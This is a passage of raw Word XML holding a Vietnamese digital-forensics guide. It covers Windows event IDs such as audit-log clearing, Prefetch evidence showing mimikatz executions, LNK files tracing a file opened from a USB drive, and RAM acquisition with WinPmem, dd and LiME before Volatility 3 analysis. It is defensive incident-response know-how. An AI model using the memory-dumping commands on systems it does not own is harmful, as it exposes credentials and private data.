            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38A0CEA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Cài dịch vụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49049FD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Dịch vụ mã độc hoặc công cụ lateral movement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="31B3A036">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2F54364C">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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1102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10A6F61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Xóa Audit Log</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35410E5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Dấu hiệu đỏ tức thời về che giấu hành vi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="11C6D94A">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20436EE2">
            <w:pPr>
              <w:pStyle w:val="26"/>
              <w:spacing w:after="20" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="righ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4104</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7406DA8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PowerShell Script Block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42FEBF6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Nội dung PowerShell đã giải mã, có thể lộ script bị làm rối.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="30"/>
    </w:tbl>
    <w:p w14:paraId="07CA71D4">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="Xc78d184dc7c6907706010d3d1e66f8853e58791"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5.5. Prefetch - bằng chứng chương trình đã chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E23185A">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Tệp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.pf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> giúp Windows tăng tốc tải ứng dụng. Mỗi tệp có tên executable, số lần chạy, tối đa tám thời điểm chạy gần nhất và danh sách tệp/thư mục ứng dụng đã truy cập. Prefetch có thể tồn tại sau khi executable bị xóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041EC183">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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>prefetch-analyze.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /mnt/evidence/Windows/Prefetch/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-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/prefetch.csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4812E3C8">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Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06870DEC">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>MIMIKATZ.EXE-7C5DA84E.pf</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Run Count: 3</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Last Run: 2026-01-14 22:43:57 UTC</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Also ran: 2026-01-14 22:41:12, 2026-01-14 22:40:58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7095E69C">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Phát hiện này chứng minh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mimikatz.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã chạy ba lần, ngay cả khi tệp gốc không còn trên đĩa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:p w14:paraId="5DFABBF7">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="lnk-files-và-jump-lists"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>5.6. LNK Files và Jump Lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D884AC">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Windows tạo shortcut LNK khi người dùng truy cập tệp theo một số cách. LNK có thể chứa đường dẫn gốc, volume serial, dấu thời gian và tên máy, kể cả khi tệp hoặc USB nguồn đã bị tháo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4CD5C7">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Recent\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213F5AA9">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65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LECmd.exe</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-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'C:\Users\Suspect\AppData\Roaming\Microsoft\Windows\Recent'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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--csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> output/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D3AE3A">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Ví dụ kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4BD8FD">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Target: E:\Stolen_Data\customer_database.xlsx</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Volume Serial: 0x4C530001 (SanDisk Cruzer Blade)</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Created: 2026-01-14 22:42:18 UTC</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Modified: 2026-01-14 22:44:51 UTC</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Machine: CORP-LAPTOP-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27064865">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Kết quả cho thấy tệp đã được mở từ USB trong khoảng thời gian sự cố, dù USB đã bị tháo trước khi thu thập.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkEnd w:id="32"/>
    <w:p w14:paraId="59D67C61">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="pháp-chứng-bộ-nhớ"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6. Pháp chứng bộ nhớ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1768D1FC">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Phân tích RAM để tìm những gì ổ đĩa không thể hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FE882C">
      <w:pPr>
        <w:pStyle w:val="3"/>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RAM có thể chứa payload đã giải mã, tiến trình đang chạy, kết nối mạng, khóa mã hóa, mã bị tiêm và đầu ra công cụ của kẻ tấn công. Pháp chứng bộ nhớ đặc biệt hữu ích với mã độc không tệp, ransomware và hành vi đã bị xóa khỏi đĩa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8D3B2E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="thu-thập-bộ-nhớ"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6.1. Thu thập bộ nhớ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D5633">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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Windows - WinPmem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>winpmem_mini_x64.exe</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--output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory.raw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>--format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> raw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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Linux - /dev/mem, nếu hệ thống cho phép</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> dd if=/dev/mem of=memory.raw bs=1M status=progress </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="45"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/dev/null</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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Linux - LiME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> insmod lime-5.15.0-generic.ko </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'path=/tmp/memory.raw format=raw'</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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Xác minh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sha256sum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory.raw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>tee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/the_cyber_bite/cases/CASE001/memory_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178696BD">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Với VMware, tạm dừng VM có thể tạo tệp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.vmem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chứa ảnh RAM hoàn chỉnh.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:p w14:paraId="0CFA80A3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="điều-tra-bằng-volatility-3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>6.2. Điều tra bằng Volatility 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6623BE">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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Thông tin hệ thống</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vol.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory.raw windows.info</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55"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t># Tiến trình đang chạy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="65"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
